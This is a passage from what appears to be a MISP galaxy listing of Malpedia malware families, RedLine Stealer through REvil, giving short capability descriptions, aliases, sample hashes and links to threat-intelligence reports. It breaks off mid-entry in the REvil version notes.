RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.

The tag is: misp-galaxy:malpedia="RedLine Stealer"

RedLine Stealer is also known as:

  • RECORDSTEALER

Table 4413. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

https://www.secureworks.com/research/darktortilla-malware-analysis

https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign

https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns

https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.youtube.com/watch?v=NI_Yw2t9zoo

https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/

https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md

https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882

https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://asec.ahnlab.com/en/30445/

https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns

https://unit42.paloaltonetworks.com/lapsus-group/

https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/

https://securityscorecard.com/research/detailed-analysis-redline-stealer

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout

https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html

https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://blog.netlab.360.com/purecrypter

https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service

https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.secureworks.com/research/the-growing-threat-from-infostealers

https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/

https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat

https://blog.morphisec.com/syk-crypter-discord

https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html

https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer

https://securelist.com/malvertising-through-search-engines/108996/

https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html

https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/

https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf

https://therecord.media/scattered-spider-ransomware-attacks-hospitality-retail

https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack

https://unit42.paloaltonetworks.com/bluesky-ransomware/

https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem

https://medium.com/@the_abjuri5t/advice-for-catching-a-redline-stealer-dca126867193

https://medium.com/@idan_malihi/redline-stealer-malware-analysis-76506ef723ab

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152

https://securityscorecard.pathfactory.com/all/a-detailed-analysis

https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html

https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/

https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/

https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/

https://ke-la.com/information-stealers-a-new-landscape/

https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html

https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/

https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf

https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://asec.ahnlab.com/ko/25837/

https://embee-research.ghost.io/yara-rule-development-il-instructions-in-redline-malware/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://asec.ahnlab.com/en/35981/

https://web.archive.org/web/20230606224056/https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152

https://www.youtube.com/watch?v=05-1Olqf6qw

https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904

https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://cyber-anubis.github.io/malware%20analysis/redline/

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html

https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload

https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/

https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer

https://embee-research.ghost.io/identifying-risepro-panels-using-censys/

https://russianpanda.com/2023/11/20/MetaStealer-Redline’s-Doppelganger/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/

https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two

https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/

https://muha2xmad.github.io/malware-analysis/fullredline/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download

https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/

https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/

https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer

https://blog.avast.com/adobe-acrobat-sign-malware

https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf

https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/

https://intel471.com/blog/privateloader-malware

REDPEPPER

The tag is: misp-galaxy:malpedia="REDPEPPER"

REDPEPPER is also known as:

  • Adupib

Table 4415. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper

https://twitter.com/ItsReallyNick/status/1136502701301346305

RedRum

Ransomware.

The tag is: misp-galaxy:malpedia="RedRum"

RedRum is also known as:

  • Grinch

  • Thanos

  • Tycoon

Table 4416. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redrum

https://id-ransomware.blogspot.com/2019/12/redrum-ransomware.html

REDSHAWL

REDSHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via the command line.

The tag is: misp-galaxy:malpedia="REDSHAWL"

REDSHAWL is also known as:

Table 4418. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl

https://securelist.com/lazarus-under-the-hood/77908/

https://content.fireeye.com/apt/rpt-apt38

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

Redyms

The tag is: misp-galaxy:malpedia="Redyms"

Redyms is also known as:

Table 4419. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms

https://www.welivesecurity.com/2013/02/04/what-do-win32redyms-and-tdl4-have-in-common/

Red Alert

The tag is: misp-galaxy:malpedia="Red Alert"

Red Alert is also known as:

Table 4420. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert

https://twitter.com/JaromirHorejsi/status/816237293073797121

Red Gambler

The tag is: misp-galaxy:malpedia="Red Gambler"

Red Gambler is also known as:

Table 4421. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler

http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf

Regin

Regin is a sophisticated malware and hacking toolkit attributed to the United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, including telecom, government, and financial institutions. It was engineered to be modular, and over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations including private companies, government entities, and research institutes.

The tag is: misp-galaxy:malpedia="Regin"

Regin is also known as:

Table 4423. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.regin

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf

https://securelist.com/big-threats-using-code-similarity-part-1/97239/

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf

https://www.epicturla.com/previous-works/hitb2020-voltron-sta

https://www.youtube.com/watch?v=jeLd-gw2bWo

https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/

RegretLocker

According to PCrisk, RegretLocker is malicious software classified as ransomware. Systems infected with this malware have their data encrypted and users receive ransom demands for decryption. During the encryption process, all affected files are appended with the ".mouse" extension.

The tag is: misp-galaxy:malpedia="RegretLocker"

RegretLocker is also known as:

Table 4424. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker

https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/

https://twitter.com/malwrhunterteam/status/1321375502179905536

http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/

RekenSom

Ransomware.

The tag is: misp-galaxy:malpedia="RekenSom"

RekenSom is also known as:

  • GHack Ransomware

Table 4425. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom

https://id-ransomware.blogspot.com/2020/03/rekensom-ransomware.html

win.rekoobe

A Trojan for Windows with the same code structure and functionality as elf.rekoobe, which targets Linux environments instead.

The tag is: misp-galaxy:malpedia="win.rekoobe"

win.rekoobe is also known as:

  • tinyshell.win

  • tshd.win

Table 4426. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew

https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

https://www.mandiant.com/resources/fin13-cybercriminal-mexico

Rekt Loader

The tag is: misp-galaxy:malpedia="Rekt Loader"

Rekt Loader is also known as:

Table 4427. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rektloader

https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html

Rektware

The tag is: misp-galaxy:malpedia="Rektware"

Rektware is also known as:

  • PRZT Ransomware

Table 4428. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rektware

https://id-ransomware.blogspot.com/2018/09/rektware-ransomware.html

RelicRace

The tag is: misp-galaxy:malpedia="RelicRace"

RelicRace is also known as:

Table 4429. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.relic_race

https://cert.gov.ua/article/955924

Remcos

Remcos (an acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool for remotely controlling computers.

Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.

The tag is: misp-galaxy:malpedia="Remcos"

Remcos is also known as:

  • RemcosRAT

  • Remvio

  • Socmer

Table 4431. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.telsy.com/download/4832/

https://cert.gov.ua/article/3804703

https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/

https://perception-point.io/behind-the-attack-remcos-rat/

https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html

https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/

https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method

https://www.esentire.com/blog/remcos-rat

https://www.zscaler.com/blogs/security-research/latest-version-amadey-introduces-screen-capturing-and-pushes-remcos-rat

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/

https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout

https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers

https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/

https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/

https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf

https://socprime.com/blog/remcos-rat-detection-uac-0050-hackers-launch-phishing-attacks-impersonating-the-security-service-of-ukraine/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html

https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/

https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD

https://dissectingmalwa.re/malicious-ratatouille.html

https://secrary.com/ReversingMalware/RemcosRAT/

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities

https://cert.gov.ua/article/3931296

https://asec.ahnlab.com/en/32376/

https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

http://malware-traffic-analysis.net/2017/12/22/index.html

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire

https://blog.morphisec.com/nft-malware-new-evasion-abilities

https://www.connectwise.com/resources/formbook-remcos-rat

https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service

https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/

https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html

https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87

https://embee-research.ghost.io/decoding-a-remcos-loader-script-visual-basic-deobfuscation/

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/

https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/

https://cert.gov.ua/article/6276652

https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/

https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf

https://www.youtube.com/watch?v=DIH4SvKuktM

https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly

https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://muha2xmad.github.io/unpacking/remcos/

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

https://www.vmray.com/cyber-security-blog/smart-memory-dumping/

https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/

https://asec.ahnlab.com/ko/25837/

https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/

https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/

https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/

https://asec.ahnlab.com/ko/32101/

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.jaiminton.com/reverse-engineering/remcos#

https://socprime.com/blog/new-phishing-attack-detection-attributed-to-the-uac-0050-and-uac-0096-groups-spreading-remcos-spyware/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html

https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2

https://news.sophos.com/en-us/2020/05/14/raticate/

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md

https://muha2xmad.github.io/mal-document/remcosdoc/

https://intel471.com/blog/privateloader-malware

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns

Remexi

Remexi is a highly advanced and stealthy malware discovered in recent times. It employs sophisticated evasion techniques to infiltrate target systems and networks undetected. This malware uses various propagation vectors, including exploit kits, social engineering tactics, and compromised websites. Once inside a system, Remexi establishes persistence through rootkit capabilities and leverages command-and-control infrastructure to receive and execute malicious commands. It possesses keylogging and data exfiltration capabilities, enabling it to steal sensitive information such as login credentials and financial data. Additionally, Remexi can download and execute additional payloads, making it adaptable and capable of evolving its malicious activities over time.

The tag is: misp-galaxy:malpedia="Remexi"

Remexi is also known as:

  • CACHEMONEY

Table 4432. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

https://twitter.com/QW5kcmV3/status/1095833216605401088

https://www.secureworks.com/research/threat-profiles/cobalt-hickman

https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

https://securelist.com/chafer-used-remexi-malware/89538/

http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf

https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf

https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

RemoteControl

The tag is: misp-galaxy:malpedia="RemoteControl"

RemoteControl is also known as:

  • remotecontrolclient

Table 4434. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.remotecontrolclient

https://github.com/frozleaf/RemoteControl

Retefe (Windows)

Retefe is a Windows banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. Its primary functionality is to assist the attacker in stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper for a JavaScript file which builds a VBA file, which in turn loads multiple tools onto the host, including 7zip and Tor. The VBA installs a new root certificate and then forwards all traffic via Tor to the attacker-controlled host in order to effectively MITM TLS traffic.

The tag is: misp-galaxy:malpedia="Retefe (Windows)"

Retefe (Windows) is also known as:

  • Tsukuba

  • Werdlod

Table 4439. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe

https://github.com/Tomasuh/retefe-unpacker

https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/

https://www.govcert.admin.ch/blog/35/reversing-retefe

https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe

https://github.com/cocaman/retefe

https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/

https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/

https://www.govcert.admin.ch/blog/33/the-retefe-saga

Revenant

According to its author, Revenant is a 3rd party agent for Havoc written in C, and based on Talon. This implant is meant to expand on the Talon implant by implementing covert methods of execution, robust capabilities, and more customization.

The tag is: misp-galaxy:malpedia="Revenant"

Revenant is also known as:

Table 4441. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant

https://github.com/0xTriboulet/Revenant

Revenge RAT

According to Cofense, Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities.

The tag is: misp-galaxy:malpedia="Revenge RAT"

Revenge RAT is also known as:

  • Revetrat

Table 4442. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat

https://embee-research.ghost.io/introduction-to-dotnet-configuration-extraction-revengerat/

https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/

https://blogs.360.cn/post/APT-C-44.html

https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/

https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html

https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns

https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america

https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html

https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://blog.reversinglabs.com/blog/dotnet-loaders

https://blog.reversinglabs.com/blog/rats-in-the-library

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md

https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

https://securelist.com/revengehotels/95229/

https://isc.sans.edu/diary/rss/22590

Reveton

Ransomware.

The tag is: misp-galaxy:malpedia="Reveton"

Reveton is also known as:

Table 4444. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton

https://krebsonsecurity.com/2012/08/inside-a-reveton-ransomware-operation/

REvil (Windows)

REvil Beta
MD5: bed6fc04aeb785815744706239a1f243
SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf
SHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45
* Privilege escalation via CVE-2018-8453 (64-bit only)
* Rerun with RunAs to elevate privileges
* Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur
* Implements target whitelisting using GetKeyboardLayoutList
* Contains debug console logging functionality
* Defines the REvil registry root key as SOFTWARE\!test
* Includes two variable placeholders in the ransom note: UID & KEY
* Terminates processes specified in the "prc" configuration key prior to encryption
* Deletes shadow copies and disables recovery
* Wipes contents of folders specified in the "wfld" configuration key prior to encryption
* Encrypts all non-whitelisted files on fixed drives
* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe
* Partially implements a background image setting to display a basic "Image text" message
* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)

REvil 1.00
MD5: 65aa793c000762174b2f86077bdafaea
SHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457
SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc
* Adds 32-bit implementation of CVE-2018-8453 exploit
* Removes console debug logging
* Changes the REvil registry root key to SOFTWARE\recfg
* Removes the System/Impersonation success requirement for encrypting network mapped drives
* Adds a "wipe" key to the configuration for optional folder wiping
* Fully implements the background image setting and leverages values defined in the "img" configuration key
* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT
* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL
* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data

REvil 1.01
MD5: 2abff29b4d87f30f011874b6e98959e9
SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c
SHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb
* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level
* Makes encryption of network mapped drives optional by adding the "-nolan" argument

REvil 1.02
MD5: 4af953b20f3a1f165e7cf31d6156c035
